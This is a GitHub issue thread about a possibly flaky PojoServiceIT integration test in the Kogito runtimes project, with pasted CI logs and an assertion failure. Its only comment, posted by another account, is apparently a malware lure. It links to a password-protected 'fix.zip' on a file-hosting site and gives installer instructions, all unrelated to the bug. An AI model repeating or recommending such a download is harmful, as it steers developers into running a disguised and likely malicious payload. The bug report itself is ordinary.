### ISSUE TITLE
Possible flaky PojoServiceIT in kogito-quarkus-serverless-workflow-integration-test

### ISSUE THREAD

**Issue by tkobayas** [apache/incubator-kie-kogito-runtimes#3645]
### Describe the bug

I experienced this failure in a GHA PR check:
https://github.com/apache/incubator-kie-kogito-runtimes/actions/runs/10589162049/job/29342826385?pr=3644

```
2024-08-28T02:50:00.5612312Z [INFO] Running org.kie.kogito.quarkus.workflows.PojoServiceIT
2024-08-28T02:50:00.7057158Z 2024-08-28 02:50:00,581 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdatainput' changed value from: 'null', to: '{"name":"javierito","age":666}'
2024-08-28T02:50:00.7061407Z 2024-08-28 02:50:00,581 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data change
2024-08-28T02:50:00.7062672Z {
2024-08-28T02:50:00.7063143Z   "name" : "javierito",
2024-08-28T02:50:00.7063558Z   "age" : 666
2024-08-28T02:50:00.7063912Z }
2024-08-28T02:50:00.7065606Z 2024-08-28 02:50:00,581 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Starting workflow 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe)
2024-08-28T02:50:00.7068061Z 2024-08-28 02:50:00,581 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data
2024-08-28T02:50:00.7069289Z {
2024-08-28T02:50:00.7069675Z   "name" : "javierito",
2024-08-28T02:50:00.7070146Z   "age" : 666
2024-08-28T02:50:00.7070578Z }
2024-08-28T02:50:00.7072560Z 2024-08-28 02:50:00,581 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'Start' for process 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe)
2024-08-28T02:50:00.7075909Z 2024-08-28 02:50:00,582 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'callService' for process 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe)
2024-08-28T02:50:00.7079247Z 2024-08-28 02:50:00,582 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'getPerson' for process 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe)
2024-08-28T02:50:00.7082765Z 2024-08-28 02:50:00,665 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.name' changed value from: '"javierito"', to: '"javieritoPerson"'
2024-08-28T02:50:00.7086196Z 2024-08-28 02:50:00,665 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.workflowdatainput' changed value from: 'null', to: '{"name":"javierito","age":666}'
2024-08-28T02:50:00.7089727Z 2024-08-28 02:50:00,665 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.workflowdatainput' changed value from: '{"name":"javierito","age":666}', to: 'null'
2024-08-28T02:50:00.7092723Z 2024-08-28 02:50:00,665 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data change
2024-08-28T02:50:00.7094010Z {
2024-08-28T02:50:00.7095422Z   "name" : "javieritoPerson"
2024-08-28T02:50:00.7095922Z }
2024-08-28T02:50:00.7097805Z 2024-08-28 02:50:00,665 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'finish' for process 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe)
2024-08-28T02:50:00.7101169Z 2024-08-28 02:50:00,666 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'printMessage' for process 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe)
2024-08-28T02:50:00.7104026Z 2024-08-28 02:50:00,666 INFO  [org.kie.kog.ser.wor.act.SysoutAction] (executor-thread-1) javieritoPerson
2024-08-28T02:50:00.7106572Z 2024-08-28 02:50:00,666 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'End' for process 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe)
2024-08-28T02:50:00.7109896Z 2024-08-28 02:50:00,666 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow 'pojoService' (fdf41d0e-f103-4779-86f6-abb924ce13fe) completed
2024-08-28T02:50:00.7113030Z 2024-08-28 02:50:00,666 WARN  [org.kie.kog.per.jdb.JDBCProcessInstances] (executor-thread-1) Skipping create of process instance id: fdf41d0e-f103-4779-86f6-abb924ce13fe, state: 2
2024-08-28T02:50:12.0418229Z 2024-08-28 02:50:11,939 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdatainput' changed value from: 'null', to: '{"income":666.3,"basicDataPerson":{"cardId":"cardID","discount":100.01,"count":5,"enabled":true,"birthDate":934416000000},"name":"javierito","creationDate":1657152000000,"age":666}'
2024-08-28T02:50:12.0423470Z 2024-08-28 02:50:11,939 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data change
2024-08-28T02:50:12.0425647Z {
2024-08-28T02:50:12.0426512Z   "income" : 666.3,
2024-08-28T02:50:12.0428940Z   "basicDataPerson" : {
2024-08-28T02:50:12.0429847Z     "cardId" : "cardID",
2024-08-28T02:50:12.0430619Z     "discount" : 100.01,
2024-08-28T02:50:12.0431422Z     "count" : 5,
2024-08-28T02:50:12.0432174Z     "enabled" : true,
2024-08-28T02:50:12.0433930Z     "birthDate" : 934416000000
2024-08-28T02:50:12.0434592Z   },
2024-08-28T02:50:12.0435117Z   "name" : "javierito",
2024-08-28T02:50:12.0435896Z   "creationDate" : 1657152000000,
2024-08-28T02:50:12.0436763Z   "age" : 666
2024-08-28T02:50:12.0437477Z }
2024-08-28T02:50:12.0439581Z 2024-08-28 02:50:11,940 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Starting workflow 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1)
2024-08-28T02:50:12.0442526Z 2024-08-28 02:50:11,940 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data
2024-08-28T02:50:12.0444104Z {
2024-08-28T02:50:12.0444486Z   "income" : 666.3,
2024-08-28T02:50:12.0444957Z   "basicDataPerson" : {
2024-08-28T02:50:12.0445461Z     "cardId" : "cardID",
2024-08-28T02:50:12.0445954Z     "discount" : 100.01,
2024-08-28T02:50:12.0446418Z     "count" : 5,
2024-08-28T02:50:12.0446836Z     "enabled" : true,
2024-08-28T02:50:12.0447296Z     "birthDate" : 934416000000
2024-08-28T02:50:12.0447777Z   },
2024-08-28T02:50:12.0448133Z   "name" : "javierito",
2024-08-28T02:50:12.0448561Z   "creationDate" : 1657152000000,
2024-08-28T02:50:12.0449017Z   "age" : 666
2024-08-28T02:50:12.0449377Z }
2024-08-28T02:50:12.0451250Z 2024-08-28 02:50:11,940 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'Start' for process 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1)
2024-08-28T02:50:12.0454685Z 2024-08-28 02:50:11,940 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'callService' for process 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1)
2024-08-28T02:50:12.0457873Z 2024-08-28 02:50:11,940 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'getPerson' for process 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1)
2024-08-28T02:50:12.0461257Z 2024-08-28 02:50:11,944 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.name' changed value from: '"javierito"', to: '"javieritoPerson"'
2024-08-28T02:50:12.0464447Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.age' changed value from: '666', to: '1'
2024-08-28T02:50:12.0467612Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.income' changed value from: '666.3', to: '20000.5'
2024-08-28T02:50:12.0470652Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.cardId' changed value from: 'null', to: '"cardID"'
2024-08-28T02:50:12.0473865Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.discount' changed value from: 'null', to: '100.01'
2024-08-28T02:50:12.0476811Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.count' changed value from: 'null', to: '1'
2024-08-28T02:50:12.0479595Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.enabled' changed value from: 'null', to: 'true'
2024-08-28T02:50:12.0482647Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.birthDate' changed value from: 'null', to: '1657152000000'
2024-08-28T02:50:12.0487156Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.workflowdatainput' changed value from: 'null', to: '{"income":666.3,"basicDataPerson":{"cardId":"cardID","discount":100.01,"count":5,"enabled":true,"birthDate":934416000000},"name":"javierito","creationDate":1657152000000,"age":666}'
2024-08-28T02:50:12.0492491Z 2024-08-28 02:50:11,945 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.workflowdatainput' changed value from: '{"income":666.3,"basicDataPerson":{"cardId":"cardID","discount":100.01,"count":5,"enabled":true,"birthDate":934416000000},"name":"javierito","creationDate":1657152000000,"age":666}', to: 'null'
2024-08-28T02:50:12.0496334Z 2024-08-28 02:50:11,946 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data change
2024-08-28T02:50:12.0497615Z {
2024-08-28T02:50:12.0498005Z   "name" : "javieritoPerson",
2024-08-28T02:50:12.0498517Z   "age" : 1,
2024-08-28T02:50:12.0498919Z   "income" : 20000.5,
2024-08-28T02:50:12.0499372Z   "creationDate" : 1657152000000,
2024-08-28T02:50:12.0499912Z   "cardId" : "cardID",
2024-08-28T02:50:12.0500360Z   "discount" : 100.01,
2024-08-28T02:50:12.0500771Z   "count" : 5,
2024-08-28T02:50:12.0501156Z   "enabled" : true,
2024-08-28T02:50:12.0501581Z   "birthDate" : 934416000000
2024-08-28T02:50:12.0502038Z }
2024-08-28T02:50:12.0503971Z 2024-08-28 02:50:11,946 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'finish' for process 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1)
2024-08-28T02:50:12.0507279Z 2024-08-28 02:50:11,946 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'printMessage' for process 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1)
2024-08-28T02:50:12.0509857Z 2024-08-28 02:50:11,946 INFO  [org.kie.kog.ser.wor.act.SysoutAction] (executor-thread-1) javieritoPerson
2024-08-28T02:50:12.0512284Z 2024-08-28 02:50:11,946 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'End' for process 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1)
2024-08-28T02:50:12.0515338Z 2024-08-28 02:50:11,946 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow 'pojoServiceTypes' (522b8732-546d-44ff-8f66-c8a306a7eed1) completed
2024-08-28T02:50:12.0518123Z 2024-08-28 02:50:11,947 WARN  [org.kie.kog.per.jdb.JDBCProcessInstances] (executor-thread-1) Skipping create of process instance id: 522b8732-546d-44ff-8f66-c8a306a7eed1, state: 2
2024-08-28T02:50:12.5421813Z 2024-08-28 02:50:12,536 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdatainput' changed value from: 'null', to: '{"third":9,"first":3,"second":6}'
2024-08-28T02:50:12.5425224Z 2024-08-28 02:50:12,536 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data change
2024-08-28T02:50:12.5426447Z {
2024-08-28T02:50:12.5426782Z   "third" : 9,
2024-08-28T02:50:12.5427156Z   "first" : 3,
2024-08-28T02:50:12.5427701Z   "second" : 6
2024-08-28T02:50:12.5428186Z }
2024-08-28T02:50:12.5429943Z 2024-08-28 02:50:12,537 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Starting workflow 'squareService' (24680d44-4982-4258-9ae0-a34acc091e17)
2024-08-28T02:50:12.5432423Z 2024-08-28 02:50:12,537 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data
2024-08-28T02:50:12.5433110Z {
2024-08-28T02:50:12.5433315Z   "third" : 9,
2024-08-28T02:50:12.5433535Z   "first" : 3,
2024-08-28T02:50:12.5433820Z   "second" : 6
2024-08-28T02:50:12.5434161Z }
2024-08-28T02:50:12.5435881Z 2024-08-28 02:50:12,537 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'Start' for process 'squareService' (24680d44-4982-4258-9ae0-a34acc091e17)
2024-08-28T02:50:12.5438849Z 2024-08-28 02:50:12,537 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'CallService' for process 'squareService' (24680d44-4982-4258-9ae0-a34acc091e17)
2024-08-28T02:50:12.5441832Z 2024-08-28 02:50:12,537 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'square' for process 'squareService' (24680d44-4982-4258-9ae0-a34acc091e17)
2024-08-28T02:50:12.5444711Z 2024-08-28 02:50:12,540 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.response' changed value from: 'null', to: '[9,36,81]'
2024-08-28T02:50:12.5447688Z 2024-08-28 02:50:12,540 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'End' for process 'squareService' (24680d44-4982-4258-9ae0-a34acc091e17)
2024-08-28T02:50:12.5450578Z 2024-08-28 02:50:12,540 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow 'squareService' (24680d44-4982-4258-9ae0-a34acc091e17) completed
2024-08-28T02:50:12.5453250Z 2024-08-28 02:50:12,540 WARN  [org.kie.kog.per.jdb.JDBCProcessInstances] (executor-thread-1) Skipping create of process instance id: 24680d44-4982-4258-9ae0-a34acc091e17, state: 2
2024-08-28T02:50:12.6427905Z 2024-08-28 02:50:12,569 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdatainput' changed value from: 'null', to: '{"name":"javierito","age":666}'
2024-08-28T02:50:12.6430600Z 2024-08-28 02:50:12,569 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data change
2024-08-28T02:50:12.6431817Z {
2024-08-28T02:50:12.6432168Z   "name" : "javierito",
2024-08-28T02:50:12.6432589Z   "age" : 666
2024-08-28T02:50:12.6444881Z }
2024-08-28T02:50:12.6446669Z 2024-08-28 02:50:12,569 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Starting workflow 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4)
2024-08-28T02:50:12.6449191Z 2024-08-28 02:50:12,569 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data
2024-08-28T02:50:12.6450418Z {
2024-08-28T02:50:12.6450768Z   "name" : "javierito",
2024-08-28T02:50:12.6451189Z   "age" : 666
2024-08-28T02:50:12.6451537Z }
2024-08-28T02:50:12.6453406Z 2024-08-28 02:50:12,569 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'Start' for process 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4)
2024-08-28T02:50:12.6468842Z 2024-08-28 02:50:12,569 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'callService' for process 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4)
2024-08-28T02:50:12.6472740Z 2024-08-28 02:50:12,569 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'getPerson' for process 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4)
2024-08-28T02:50:12.6485458Z 2024-08-28 02:50:12,571 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.name' changed value from: '"javierito"', to: '"javieritoPerson"'
2024-08-28T02:50:12.6490565Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.workflowdatainput' changed value from: 'null', to: '{"name":"javierito","age":666}'
2024-08-28T02:50:12.6494595Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Property 'workflowdata.workflowdatainput' changed value from: '{"name":"javierito","age":666}', to: 'null'
2024-08-28T02:50:12.6498685Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow data change
2024-08-28T02:50:12.6499926Z {
2024-08-28T02:50:12.6500279Z   "name" : "javieritoPerson"
2024-08-28T02:50:12.6500720Z }
2024-08-28T02:50:12.6502566Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'finish' for process 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4)
2024-08-28T02:50:12.6505804Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'printMessage' for process 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4)
2024-08-28T02:50:12.6509426Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.act.SysoutAction] (executor-thread-1) javieritoPerson
2024-08-28T02:50:12.6511926Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Triggered node 'End' for process 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4)
2024-08-28T02:50:12.6515024Z 2024-08-28 02:50:12,572 INFO  [org.kie.kog.ser.wor.dev.DevModeServerlessWorkflowLogger] (executor-thread-1) Workflow 'pojoServiceFilter' (c0c58253-8701-4504-9d7e-3436f9fd1af4) completed
2024-08-28T02:50:12.6517965Z 2024-08-28 02:50:12,573 WARN  [org.kie.kog.per.jdb.JDBCProcessInstances] (executor-thread-1) Skipping create of process instance id: c0c58253-8701-4504-9d7e-3436f9fd1af4, state: 2
2024-08-28T02:50:13.1132406Z [ERROR] Tests run: 4, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 12.55 s <<< FAILURE! -- in org.kie.kogito.quarkus.workflows.PojoServiceIT
2024-08-28T02:50:13.1133838Z [ERROR] org.kie.kogito.quarkus.workflows.PojoServiceIT.testPojo -- Time elapsed: 11.35 s <<< FAILURE!
2024-08-28T02:50:13.1135211Z java.lang.AssertionError:
2024-08-28T02:50:13.1135532Z
2024-08-28T02:50:13.1135701Z Expected size: 1 but was: 2 in:
2024-08-28T02:50:13.1136221Z {"age"=666, "name"="javieritoPerson"}
2024-08-28T02:50:13.1137006Z    at org.kie.kogito.quarkus.workflows.PojoServiceIT.doIt(PojoServiceIT.java:169)
2024-08-28T02:50:13.1137776Z    at org.kie.kogito.quarkus.workflows.PojoServiceIT.testPojo(PojoServiceIT.java:77)
2024-08-28T02:50:13.1138439Z    at java.base/java.lang.reflect.Method.invoke(Method.java:569)
2024-08-28T02:50:13.1138984Z    at java.base/java.util.ArrayList.forEach(ArrayList.java:1511)
2024-08-28T02:50:13.1139513Z    at java.base/java.util.ArrayList.forEach(ArrayList.java:1511)
2024-08-28T02:50:13.1140038Z
```

I cannot reproduce the failure locally, so not confident how flaky it is.

### Expected behavior

PojoServiceIT passes

### Actual behavior

Failed as pasted above.

### How to Reproduce?

In a GHA PR check in kogito-runtimes.

I couldn't reproduce it locally.

### Output of `uname -a` or `ver`

Linux tkobayas-thinkpadt14sgen1.tokyo.csb 6.10.4-100.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Aug 11 15:56:38 UTC 2024 x86_64 GNU/Linux

### Output of `java -version`

openjdk version "17.0.12" 2024-07-16 OpenJDK Runtime Environment (Red_Hat-17.0.12.0.7-2) (build 17.0.12+7) OpenJDK 64-Bit Server VM (Red_Hat-17.0.12.0.7-2) (build 17.0.12+7, mixed mode, sharing)

### Kogito version or git rev (or at least Quarkus version if you are using Kogito via Quarkus platform BOM)

main branch

### Build tool (ie. output of `mvnw --version` or `gradlew --version`)

Apache Maven 3.9.6 (bc0240f3c744dd6b6ec2920b3cd08dcc295161ae)

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
